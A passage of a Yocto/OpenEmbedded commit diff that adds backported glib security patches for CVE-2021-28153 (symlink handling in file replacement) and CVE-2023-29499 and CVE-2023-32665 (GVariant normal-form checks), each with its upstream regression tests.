+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/glocalfileoutputstream.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+--- a/gio/glocalfileoutputstream.c
++++ b/gio/glocalfileoutputstream.c
+@@ -851,7 +851,7 @@ handle_overwrite_open (const char    *fi
+   mode = mode_from_flags_or_info (flags, reference_info);
+ 
+   /* We only need read access to the original file if we are creating a backup.
+-   * We also add O_CREATE to avoid a race if the file was just removed */
++   * We also add O_CREAT to avoid a race if the file was just removed */
+   if (create_backup || readable)
+     open_flags = O_RDWR | O_CREAT | O_BINARY;
+   else
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-2.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-2.patch
new file mode 100644
index 0000000000..8a35bab4de
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-2.patch
@@ -0,0 +1,42 @@
+From 32d3d02a50e7dcec5f4cf7908e7ac88d575d8fc5 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 24 Feb 2021 17:34:32 +0000
+Subject: [PATCH 2/5] tests: Stop using g_test_bug_base() in file tests
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Since a following commit is going to add a new test which references
+Gitlab, so it’s best to move the URI bases inside the test cases.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-28153
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/tests/file.c | 4 +---
+ 1 file changed, 1 insertion(+), 3 deletions(-)
+
+--- a/gio/tests/file.c
++++ b/gio/tests/file.c
+@@ -685,7 +685,7 @@ test_replace_cancel (void)
+   guint count;
+   GError *error = NULL;
+ 
+-  g_test_bug ("629301");
++  g_test_bug ("https://bugzilla.gnome.org/629301");
+ 
+   path = g_dir_make_tmp ("g_file_replace_cancel_XXXXXX", &error);
+   g_assert_no_error (error);
+@@ -1784,8 +1784,6 @@ main (int argc, char *argv[])
+ {
+   g_test_init (&argc, &argv, NULL);
+ 
+-  g_test_bug_base ("http://bugzilla.gnome.org/");
+-
+   g_test_add_func ("/file/basic", test_basic);
+   g_test_add_func ("/file/build-filename", test_build_filename);
+   g_test_add_func ("/file/parent", test_parent);
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-3.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-3.patch
new file mode 100644
index 0000000000..a82febd26e
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-3.patch
@@ -0,0 +1,57 @@
+Backport of:
+
+From ce0eb088a68171eed3ac217cb92a72e36eb57d1b Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 10 Mar 2021 16:05:55 +0000
+Subject: [PATCH 3/5] glocalfileoutputstream: Factor out a flag check
+
+This clarifies the code a little. It introduces no functional changes.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-28153
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/glocalfileoutputstream.c | 7 ++++---
+ 1 file changed, 4 insertions(+), 3 deletions(-)
+
+--- a/gio/glocalfileoutputstream.c
++++ b/gio/glocalfileoutputstream.c
+@@ -847,6 +847,7 @@ handle_overwrite_open (const char    *fi
+   int res;
+   int mode;
+   int errsv;
++  gboolean replace_destination_set = (flags & G_FILE_CREATE_REPLACE_DESTINATION);
+ 
+   mode = mode_from_flags_or_info (flags, reference_info);
+ 
+@@ -954,7 +955,7 @@ handle_overwrite_open (const char    *fi
+    * to a backup file and rewrite the contents of the file.
+    */
+   
+-  if ((flags & G_FILE_CREATE_REPLACE_DESTINATION) ||
++  if (replace_destination_set ||
+       (!(original_stat.st_nlink > 1) && !is_symlink))
+     {
+       char *dirname, *tmp_filename;
+@@ -973,7 +974,7 @@ handle_overwrite_open (const char    *fi
+       
+       /* try to keep permissions (unless replacing) */
+ 
+-      if ( ! (flags & G_FILE_CREATE_REPLACE_DESTINATION) &&
++      if (!replace_destination_set &&
+ 	   (
+ #ifdef HAVE_FCHOWN
+ 	    fchown (tmpfd, original_stat.st_uid, original_stat.st_gid) == -1 ||
+@@ -1112,7 +1113,7 @@ handle_overwrite_open (const char    *fi
+ 	}
+     }
+ 
+-  if (flags & G_FILE_CREATE_REPLACE_DESTINATION)
++  if (replace_destination_set)
+     {
+       g_close (fd, NULL);
+       
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-4.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-4.patch
new file mode 100644
index 0000000000..5b106e8474
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-4.patch
@@ -0,0 +1,265 @@
+Backport of:
+
+From 317b3b587058a05dca95d56dac26568c5b098d33 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 24 Feb 2021 17:36:07 +0000
+Subject: [PATCH 4/5] glocalfileoutputstream: Fix CREATE_REPLACE_DESTINATION
+ with symlinks
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The `G_FILE_CREATE_REPLACE_DESTINATION` flag is equivalent to unlinking
+the destination file and re-creating it from scratch. That did
+previously work, but in the process the code would call `open(O_CREAT)`
+on the file. If the file was a dangling symlink, this would create the
+destination file (empty). That’s not an intended side-effect, and has
+security implications if the symlink is controlled by a lower-privileged
+process.
+
+Fix that by not opening the destination file if it’s a symlink, and
+adjusting the rest of the code to cope with
+ - the fact that `fd == -1` is not an error iff `is_symlink` is true,
+ - and that `original_stat` will contain the `lstat()` results for the
+   symlink now, rather than the `stat()` results for its target (again,
+   iff `is_symlink` is true).
+
+This means that the target of the dangling symlink is no longer created,
+which was the bug. The symlink itself continues to be replaced (as
+before) with the new file — this is the intended behaviour of
+`g_file_replace()`.
+
+The behaviour for non-symlink cases, or cases where the symlink was not
+dangling, should be unchanged.
+
+Includes a unit test.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Fixes: #2325
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-28153
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/glocalfileoutputstream.c |  77 ++++++++++++++++++-------
+ gio/tests/file.c             | 108 +++++++++++++++++++++++++++++++++++
+ 2 files changed, 163 insertions(+), 22 deletions(-)
+
+--- a/gio/glocalfileoutputstream.c
++++ b/gio/glocalfileoutputstream.c
+@@ -875,16 +875,22 @@ handle_overwrite_open (const char    *fi
+       /* Could be a symlink, or it could be a regular ELOOP error,
+        * but then the next open will fail too. */
+       is_symlink = TRUE;
+-      fd = g_open (filename, open_flags, mode);
++      if (!replace_destination_set)
++        fd = g_open (filename, open_flags, mode);
+     }
+-#else
+-  fd = g_open (filename, open_flags, mode);
+-  errsv = errno;
++#else  /* if !O_NOFOLLOW */
+   /* This is racy, but we do it as soon as possible to minimize the race */
+   is_symlink = g_file_test (filename, G_FILE_TEST_IS_SYMLINK);
++
++  if (!is_symlink || !replace_destination_set)
++    {
++      fd = g_open (filename, open_flags, mode);
++      errsv = errno;
++    }
+ #endif
+ 
+-  if (fd == -1)
++  if (fd == -1 &&
++      (!is_symlink || !replace_destination_set))
+     {
+       char *display_name = g_filename_display_name (filename);
+       g_set_error (error, G_IO_ERROR,
+@@ -898,7 +904,14 @@ handle_overwrite_open (const char    *fi
+ #ifdef G_OS_WIN32
+   res = GLIB_PRIVATE_CALL (g_win32_fstat) (fd, &original_stat);
+ #else
+-  res = fstat (fd, &original_stat);
++  if (!is_symlink)
++    {
++      res = fstat (fd, &original_stat);
++    }
++  else
++    {
++      res = lstat (filename, &original_stat);
++    }
+ #endif
+   errsv = errno;
+ 
+@@ -917,16 +930,27 @@ handle_overwrite_open (const char    *fi
+   if (!S_ISREG (original_stat.st_mode))
+     {
+       if (S_ISDIR (original_stat.st_mode))
+-	g_set_error_literal (error,
+-                             G_IO_ERROR,
+-                             G_IO_ERROR_IS_DIRECTORY,
+-                             _("Target file is a directory"));
+-      else
+-	g_set_error_literal (error,
++        {
++          g_set_error_literal (error,
++                               G_IO_ERROR,
++                               G_IO_ERROR_IS_DIRECTORY,
++                               _("Target file is a directory"));
++          goto err_out;
++        }
++      else if (!is_symlink ||
++#ifdef S_ISLNK
++               !S_ISLNK (original_stat.st_mode)
++#else
++               FALSE
++#endif
++               )
++        {
++          g_set_error_literal (error,
+                              G_IO_ERROR,
+                              G_IO_ERROR_NOT_REGULAR_FILE,
+                              _("Target file is not a regular file"));
+-      goto err_out;
++          goto err_out;
++        }
+     }
+   
+   if (etag != NULL)
+@@ -1007,7 +1031,8 @@ handle_overwrite_open (const char    *fi
+ 	    }
+ 	}
+ 
+-      g_close (fd, NULL);
++      if (fd >= 0)
++        g_close (fd, NULL);
+       *temp_filename = tmp_filename;
+       return tmpfd;
+     }
+--- a/gio/tests/file.c
++++ b/gio/tests/file.c
+@@ -804,6 +804,113 @@ test_replace_cancel (void)
+   g_object_unref (tmpdir);
+ }
+ 
++static void
++test_replace_symlink (void)
++{
++#ifdef G_OS_UNIX
++  gchar *tmpdir_path = NULL;
++  GFile *tmpdir = NULL, *source_file = NULL, *target_file = NULL;
++  GFileOutputStream *stream = NULL;
++  const gchar *new_contents = "this is a test message which should be written to source and not target";
++  gsize n_written;
++  GFileEnumerator *enumerator = NULL;
++  GFileInfo *info = NULL;
++  gchar *contents = NULL;
++  gsize length = 0;
++  GError *local_error = NULL;
++
++  g_test_bug ("https://gitlab.gnome.org/GNOME/glib/-/issues/2325");
++  g_test_summary ("Test that G_FILE_CREATE_REPLACE_DESTINATION doesn’t follow symlinks");
++
++  /* Create a fresh, empty working directory. */
++  tmpdir_path = g_dir_make_tmp ("g_file_replace_symlink_XXXXXX", &local_error);
++  g_assert_no_error (local_error);
++  tmpdir = g_file_new_for_path (tmpdir_path);
++
++  g_test_message ("Using temporary directory %s", tmpdir_path);
++  g_free (tmpdir_path);
++
++  /* Create symlink `source` which points to `target`. */
++  source_file = g_file_get_child (tmpdir, "source");
++  target_file = g_file_get_child (tmpdir, "target");
++  g_file_make_symbolic_link (source_file, "target", NULL, &local_error);
++  g_assert_no_error (local_error);
++
++  /* Ensure that `target` doesn’t exist */
++  g_assert_false (g_file_query_exists (target_file, NULL));
++
++  /* Replace the `source` symlink with a regular file using
++   * %G_FILE_CREATE_REPLACE_DESTINATION, which should replace it *without*
++   * following the symlink */
++  stream = g_file_replace (source_file, NULL, FALSE  /* no backup */,
++                           G_FILE_CREATE_REPLACE_DESTINATION, NULL, &local_error);
++  g_assert_no_error (local_error);
++
++  g_output_stream_write_all (G_OUTPUT_STREAM (stream), new_contents, strlen (new_contents),
++                             &n_written, NULL, &local_error);
++  g_assert_no_error (local_error);
++  g_assert_cmpint (n_written, ==, strlen (new_contents));
++
++  g_output_stream_close (G_OUTPUT_STREAM (stream), NULL, &local_error);
++  g_assert_no_error (local_error);
++
++  g_clear_object (&stream);
++
++  /* At this point, there should still only be one file: `source`. It should
++   * now be a regular file. `target` should not exist. */
++  enumerator = g_file_enumerate_children (tmpdir,
++                                          G_FILE_ATTRIBUTE_STANDARD_NAME ","
++                                          G_FILE_ATTRIBUTE_STANDARD_TYPE,
++                                          G_FILE_QUERY_INFO_NOFOLLOW_SYMLINKS, NULL, &local_error);
++  g_assert_no_error (local_error);
++
++  info = g_file_enumerator_next_file (enumerator, NULL, &local_error);
++  g_assert_no_error (local_error);
++  g_assert_nonnull (info);
++
++  g_assert_cmpstr (g_file_info_get_name (info), ==, "source");
++  g_assert_cmpint (g_file_info_get_file_type (info), ==, G_FILE_TYPE_REGULAR);
++
++  g_clear_object (&info);
++
++  info = g_file_enumerator_next_file (enumerator, NULL, &local_error);
++  g_assert_no_error (local_error);
++  g_assert_null (info);
++
++  g_file_enumerator_close (enumerator, NULL, &local_error);
++  g_assert_no_error (local_error);
++  g_clear_object (&enumerator);
++
++  /* Double-check that `target` doesn’t exist */
++  g_assert_false (g_file_query_exists (target_file, NULL));
++
++  /* Check the content of `source`. */
++  g_file_load_contents (source_file,
++                        NULL,
++                        &contents,
++                        &length,
++                        NULL,
++                        &local_error);
++  g_assert_no_error (local_error);
++  g_assert_cmpstr (contents, ==, new_contents);
++  g_assert_cmpuint (length, ==, strlen (new_contents));
++  g_free (contents);
++
++  /* Tidy up. */
++  g_file_delete (source_file, NULL, &local_error);
++  g_assert_no_error (local_error);
++
++  g_file_delete (tmpdir, NULL, &local_error);
++  g_assert_no_error (local_error);
++
++  g_clear_object (&target_file);
++  g_clear_object (&source_file);
++  g_clear_object (&tmpdir);
++#else  /* if !G_OS_UNIX */
++  g_test_skip ("Symlink replacement tests can only be run on Unix")
++#endif
++}
++
+ static void
+ on_file_deleted (GObject      *object,
+ 		 GAsyncResult *result,
+@@ -1752,6 +1859,7 @@ main (int argc, char *argv[])
+   g_test_add_data_func ("/file/async-create-delete/4096", GINT_TO_POINTER (4096), test_create_delete);
+   g_test_add_func ("/file/replace-load", test_replace_load);
+   g_test_add_func ("/file/replace-cancel", test_replace_cancel);
++  g_test_add_func ("/file/replace-symlink", test_replace_symlink);
+   g_test_add_func ("/file/async-delete", test_async_delete);
+ #ifdef G_OS_UNIX
+   g_test_add_func ("/file/copy-preserve-mode", test_copy_preserve_mode);
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-5.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-5.patch
new file mode 100644
index 0000000000..2334147f7d
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-5.patch
@@ -0,0 +1,55 @@
+From 6c6439261bc7a8a0627519848a7222b3e1bd4ffe Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 24 Feb 2021 17:42:24 +0000
+Subject: [PATCH 5/5] glocalfileoutputstream: Add a missing O_CLOEXEC flag to
+ replace()
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-28153
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/glocalfileoutputstream.c | 15 ++++++++++++---
+ 1 file changed, 12 insertions(+), 3 deletions(-)
+
+--- a/gio/glocalfileoutputstream.c
++++ b/gio/glocalfileoutputstream.c
+@@ -58,6 +58,12 @@
+ #define O_BINARY 0
+ #endif
+ 
++#ifndef O_CLOEXEC
++#define O_CLOEXEC 0
++#else
++#define HAVE_O_CLOEXEC 1
++#endif
++
+ struct _GLocalFileOutputStreamPrivate {
+   char *tmp_filename;
+   char *original_filename;
+@@ -1223,7 +1229,7 @@ _g_local_file_output_stream_replace (con
+   sync_on_close = FALSE;
+ 
+   /* If the file doesn't exist, create it */
+-  open_flags = O_CREAT | O_EXCL | O_BINARY;
++  open_flags = O_CREAT | O_EXCL | O_BINARY | O_CLOEXEC;
+   if (readable)
+     open_flags |= O_RDWR;
+   else
+@@ -1253,8 +1259,11 @@ _g_local_file_output_stream_replace (con
+       set_error_from_open_errno (filename, error);
+       return NULL;
+     }
+-  
+- 
++#if !defined(HAVE_O_CLOEXEC) && defined(F_SETFD)
++  else
++    fcntl (fd, F_SETFD, FD_CLOEXEC);
++#endif
++
+   stream = g_object_new (G_TYPE_LOCAL_FILE_OUTPUT_STREAM, NULL);
+   stream->priv->fd = fd;
+   stream->priv->sync_on_close = sync_on_close;
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-29499.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-29499.patch
new file mode 100644
index 0000000000..ce90586290
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-29499.patch
@@ -0,0 +1,290 @@
+From 5f4485c4ff57fdefb1661531788def7ca5a47328 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 17 Aug 2023 04:19:44 +0000
+Subject: [PATCH] gvariant-serialiser: Check offset table entry size is minimal
+
+The entries in an offset table (which is used for variable sized arrays
+and tuples containing variable sized members) are sized so that they can
+address every byte in the overall variant.
+
+The specification requires that for a variant to be in normal form, its
+offset table entries must be the minimum width such that they can
+address every byte in the variant.
+
+That minimality requirement was not checked in
+`g_variant_is_normal_form()`, leading to two different byte arrays being
+interpreted as the normal form of a given variant tree. That kind of
+confusion could potentially be exploited, and is certainly a bug.
+
+Fix it by adding the necessary checks on offset table entry width, and
+unit tests.
+
+Spotted by William Manley.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Fixes: #2794
+
+CVE: CVE-2023-29499
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/5f4485c4ff57fdefb1661531788def7ca5a47328]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant-serialiser.c |  19 +++-
+ glib/tests/gvariant.c      | 176 +++++++++++++++++++++++++++++++++++++
+ 2 files changed, 194 insertions(+), 1 deletion(-)
+
+diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
+index 0bf7243..5aa2cbc 100644
+--- a/glib/gvariant-serialiser.c
++++ b/glib/gvariant-serialiser.c
+@@ -694,6 +694,10 @@ gvs_variable_sized_array_get_frame_offsets (GVariantSerialised value)
+   out.data_size = last_end;
+   out.array = value.data + last_end;
+   out.length = offsets_array_size / out.offset_size;
++
++  if (out.length > 0 && gvs_calculate_total_size (last_end, out.length) != value.size)
++    return out;  /* offset size not minimal */
++
+   out.is_normal = TRUE;
+ 
+   return out;
+@@ -1201,6 +1205,7 @@ gvs_tuple_is_normal (GVariantSerialised value)
+   gsize length;
+   gsize offset;
+   gsize i;
++  gsize offset_table_size;
+ 
+   /* as per the comment in gvs_tuple_get_child() */
+   if G_UNLIKELY (value.data == NULL && value.size != 0)
+@@ -1305,7 +1310,19 @@ gvs_tuple_is_normal (GVariantSerialised value)
+       }
+   }
+ 
+-  return offset_ptr == offset;
++  /* @offset_ptr has been counting backwards from the end of the variant, to
++   * find the beginning of the offset table. @offset has been counting forwards
++   * from the beginning of the variant to find the end of the data. They should
++   * have met in the middle. */
++  if (offset_ptr != offset)
++    return FALSE;
++
++  offset_table_size = value.size - offset_ptr;
++  if (value.size > 0 &&
++      gvs_calculate_total_size (offset, offset_table_size / offset_size) != value.size)
++    return FALSE;  /* offset size not minimal */
++
++  return TRUE;
+ }
+ 
+ /* Variants {{{2
+diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
+index d640c81..4ce0e4f 100644
+--- a/glib/tests/gvariant.c
++++ b/glib/tests/gvariant.c
+@@ -5092,6 +5092,86 @@ test_normal_checking_array_offsets2 (void)
+   g_variant_unref (variant);
+ }
+ 
++/* Test that an otherwise-valid serialised GVariant is considered non-normal if
++ * its offset table entries are too wide.
++ *
++ * See §2.3.6 (Framing Offsets) of the GVariant specification. */
++static void
++test_normal_checking_array_offsets_minimal_sized (void)
++{
++  GVariantBuilder builder;
++  gsize i;
++  GVariant *aay_constructed = NULL;
++  const guint8 *data = NULL;
++  guint8 *data_owned = NULL;
++  GVariant *aay_deserialised = NULL;
++  GVariant *aay_normalised = NULL;
++
++  /* Construct an array of type aay, consisting of 128 elements which are each
++   * an empty array, i.e. `[[] * 128]`. This is chosen because the inner
++   * elements are variable sized (making the outer array variable sized, so it
++   * must have an offset table), but they are also zero-sized when serialised.
++   * So the serialised representation of @aay_constructed consists entirely of
++   * its offset table, which is entirely zeroes.
++   *
++   * The array is chosen to be 128 elements long because that means offset
++   * table entries which are 1 byte long. If the elements in the array were
++   * non-zero-sized (to the extent that the overall array is ≥256 bytes long),
++   * the offset table entries would end up being 2 bytes long. */
++  g_variant_builder_init (&builder, G_VARIANT_TYPE ("aay"));
++
++  for (i = 0; i < 128; i++)
++    g_variant_builder_add_value (&builder, g_variant_new_array (G_VARIANT_TYPE_BYTE, NULL, 0));
++
++  aay_constructed = g_variant_builder_end (&builder);
++
++  /* Verify that the constructed array is in normal form, and its serialised
++   * form is `b'\0' * 128`. */
++  g_assert_true (g_variant_is_normal_form (aay_constructed));
++  g_assert_cmpuint (g_variant_n_children (aay_constructed), ==, 128);
++  g_assert_cmpuint (g_variant_get_size (aay_constructed), ==, 128);
++
++  data = g_variant_get_data (aay_constructed);
++  for (i = 0; i < g_variant_get_size (aay_constructed); i++)
++    g_assert_cmpuint (data[i], ==, 0);
++
++  /* Construct a serialised `aay` GVariant which is `b'\0' * 256`. This has to
++   * be a non-normal form of `[[] * 128]`, with 2-byte-long offset table
++   * entries, because each offset table entry has to be able to reference all of
++   * the byte boundaries in the container. All the entries in the offset table
++   * are zero, so all the elements of the array are zero-sized. */
++  data = data_owned = g_malloc0 (256);
++  aay_deserialised = g_variant_new_from_data (G_VARIANT_TYPE ("aay"),
++                                              data,
++                                              256,
++                                              FALSE,
++                                              g_free,
++                                              g_steal_pointer (&data_owned));
++
++  g_assert_false (g_variant_is_normal_form (aay_deserialised));
++  g_assert_cmpuint (g_variant_n_children (aay_deserialised), ==, 128);
++  g_assert_cmpuint (g_variant_get_size (aay_deserialised), ==, 256);
++
++  data = g_variant_get_data (aay_deserialised);
++  for (i = 0; i < g_variant_get_size (aay_deserialised); i++)
++    g_assert_cmpuint (data[i], ==, 0);
++
++  /* Get its normal form. That should change the serialised size. */
++  aay_normalised = g_variant_get_normal_form (aay_deserialised);
++
++  g_assert_true (g_variant_is_normal_form (aay_normalised));
++  g_assert_cmpuint (g_variant_n_children (aay_normalised), ==, 128);
++  g_assert_cmpuint (g_variant_get_size (aay_normalised), ==, 128);
++
++  data = g_variant_get_data (aay_normalised);
++  for (i = 0; i < g_variant_get_size (aay_normalised); i++)
++    g_assert_cmpuint (data[i], ==, 0);
++
++  g_variant_unref (aay_normalised);
++  g_variant_unref (aay_deserialised);
++  g_variant_unref (aay_constructed);
++}
++
+ /* Test that a tuple with invalidly large values in its offset table is
+  * normalised successfully without looping infinitely. */
+ static void
+@@ -5286,6 +5366,98 @@ test_normal_checking_tuple_offsets4 (void)
+   g_variant_unref (variant);
+ }
+ 
++/* Test that an otherwise-valid serialised GVariant is considered non-normal if
++ * its offset table entries are too wide.
++ *
++ * See §2.3.6 (Framing Offsets) of the GVariant specification. */
++static void
++test_normal_checking_tuple_offsets_minimal_sized (void)
++{
++  GString *type_string = NULL;
++  GVariantBuilder builder;
++  gsize i;
++  GVariant *ray_constructed = NULL;
++  const guint8 *data = NULL;
++  guint8 *data_owned = NULL;
++  GVariant *ray_deserialised = NULL;
++  GVariant *ray_normalised = NULL;
++
++  /* Construct a tuple of type (ay…ay), consisting of 129 members which are each
++   * an empty array, i.e. `([] * 129)`. This is chosen because the inner
++   * members are variable sized, so the outer tuple must have an offset table,
++   * but they are also zero-sized when serialised. So the serialised
++   * representation of @ray_constructed consists entirely of its offset table,
++   * which is entirely zeroes.
++   *
++   * The tuple is chosen to be 129 members long because that means it has 128
++   * offset table entries which are 1 byte long each. If the members in the
++   * tuple were non-zero-sized (to the extent that the overall tuple is ≥256
++   * bytes long), the offset table entries would end up being 2 bytes long.
++   *
++   * 129 members are used unlike 128 array elements in
++   * test_normal_checking_array_offsets_minimal_sized(), because the last member
++   * in a tuple never needs an offset table entry. */
++  type_string = g_string_new ("");
++  g_string_append_c (type_string, '(');
++  for (i = 0; i < 129; i++)
++    g_string_append (type_string, "ay");
++  g_string_append_c (type_string, ')');
++
++  g_variant_builder_init (&builder, G_VARIANT_TYPE (type_string->str));
++
++  for (i = 0; i < 129; i++)
++    g_variant_builder_add_value (&builder, g_variant_new_array (G_VARIANT_TYPE_BYTE, NULL, 0));
++
++  ray_constructed = g_variant_builder_end (&builder);
++
++  /* Verify that the constructed tuple is in normal form, and its serialised
++   * form is `b'\0' * 128`. */
++  g_assert_true (g_variant_is_normal_form (ray_constructed));
++  g_assert_cmpuint (g_variant_n_children (ray_constructed), ==, 129);
++  g_assert_cmpuint (g_variant_get_size (ray_constructed), ==, 128);
++
++  data = g_variant_get_data (ray_constructed);
++  for (i = 0; i < g_variant_get_size (ray_constructed); i++)
++    g_assert_cmpuint (data[i], ==, 0);
++
++  /* Construct a serialised `(ay…ay)` GVariant which is `b'\0' * 256`. This has
++   * to be a non-normal form of `([] * 129)`, with 2-byte-long offset table
++   * entries, because each offset table entry has to be able to reference all of
++   * the byte boundaries in the container. All the entries in the offset table
++   * are zero, so all the members of the tuple are zero-sized. */
++  data = data_owned = g_malloc0 (256);
++  ray_deserialised = g_variant_new_from_data (G_VARIANT_TYPE (type_string->str),
++                                              data,
++                                              256,
++                                              FALSE,
++                                              g_free,
++                                              g_steal_pointer (&data_owned));
++
++  g_assert_false (g_variant_is_normal_form (ray_deserialised));
++  g_assert_cmpuint (g_variant_n_children (ray_deserialised), ==, 129);
++  g_assert_cmpuint (g_variant_get_size (ray_deserialised), ==, 256);
++
++  data = g_variant_get_data (ray_deserialised);
++  for (i = 0; i < g_variant_get_size (ray_deserialised); i++)
++    g_assert_cmpuint (data[i], ==, 0);
++
++  /* Get its normal form. That should change the serialised size. */
++  ray_normalised = g_variant_get_normal_form (ray_deserialised);
++
++  g_assert_true (g_variant_is_normal_form (ray_normalised));
++  g_assert_cmpuint (g_variant_n_children (ray_normalised), ==, 129);
++  g_assert_cmpuint (g_variant_get_size (ray_normalised), ==, 128);
++
++  data = g_variant_get_data (ray_normalised);
++  for (i = 0; i < g_variant_get_size (ray_normalised); i++)
++    g_assert_cmpuint (data[i], ==, 0);
++
++  g_variant_unref (ray_normalised);
++  g_variant_unref (ray_deserialised);
++  g_variant_unref (ray_constructed);
++  g_string_free (type_string, TRUE);
++}
++
+ /* Test that an empty object path is normalised successfully to the base object
+  * path, ‘/’. */
+ static void
+@@ -5431,6 +5603,8 @@ main (int argc, char **argv)
+                    test_normal_checking_array_offsets);
+   g_test_add_func ("/gvariant/normal-checking/array-offsets2",
+                    test_normal_checking_array_offsets2);
++  g_test_add_func ("/gvariant/normal-checking/array-offsets/minimal-sized",
++                   test_normal_checking_array_offsets_minimal_sized);
+   g_test_add_func ("/gvariant/normal-checking/tuple-offsets",
+                    test_normal_checking_tuple_offsets);
+   g_test_add_func ("/gvariant/normal-checking/tuple-offsets2",
+@@ -5439,6 +5613,8 @@ main (int argc, char **argv)
+                    test_normal_checking_tuple_offsets3);
+   g_test_add_func ("/gvariant/normal-checking/tuple-offsets4",
+                    test_normal_checking_tuple_offsets4);
++  g_test_add_func ("/gvariant/normal-checking/tuple-offsets/minimal-sized",
++                   test_normal_checking_tuple_offsets_minimal_sized);
+   g_test_add_func ("/gvariant/normal-checking/empty-object-path",
+                    test_normal_checking_empty_object_path);
+ 
+-- 
+2.24.4
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32611-0001.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32611-0001.patch
new file mode 100644
index 0000000000..b2187f2af9
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32611-0001.patch
@@ -0,0 +1,89 @@
+From 1deacdd4e8e35a5cf1417918ca4f6b0afa6409b1 Mon Sep 17 00:00:00 2001
+From: William Manley <will@stb-tester.com>
+Date: Wed, 9 Aug 2023 10:04:49 +0000
+Subject: [PATCH] gvariant-core: Consolidate construction of
+ `GVariantSerialised`
+
+So I only need to change it in one place.
+
+This introduces no functional changes.
+
+Helps: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/1deacdd4e8e35a5cf1417918ca4f6b0afa6409b1]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant.c       |  8 +++++---
+ glib/tests/gvariant.c | 24 ++++++++++++++++++++++++
+ 2 files changed, 29 insertions(+), 3 deletions(-)
+
+diff --git a/glib/gvariant.c b/glib/gvariant.c
+index 8ba701e..4dbd9e8 100644
+--- a/glib/gvariant.c
++++ b/glib/gvariant.c
+@@ -5952,14 +5952,16 @@ g_variant_byteswap (GVariant *value)
+       g_variant_serialised_byteswap (serialised);
+ 
+       bytes = g_bytes_new_take (serialised.data, serialised.size);
+-      new = g_variant_new_from_bytes (g_variant_get_type (value), bytes, TRUE);
++      new = g_variant_ref_sink (g_variant_new_from_bytes (g_variant_get_type (value), bytes, TRUE));
+       g_bytes_unref (bytes);
+     }
+   else
+     /* contains no multi-byte data */
+-    new = value;
++    new = g_variant_get_normal_form (value);
+ 
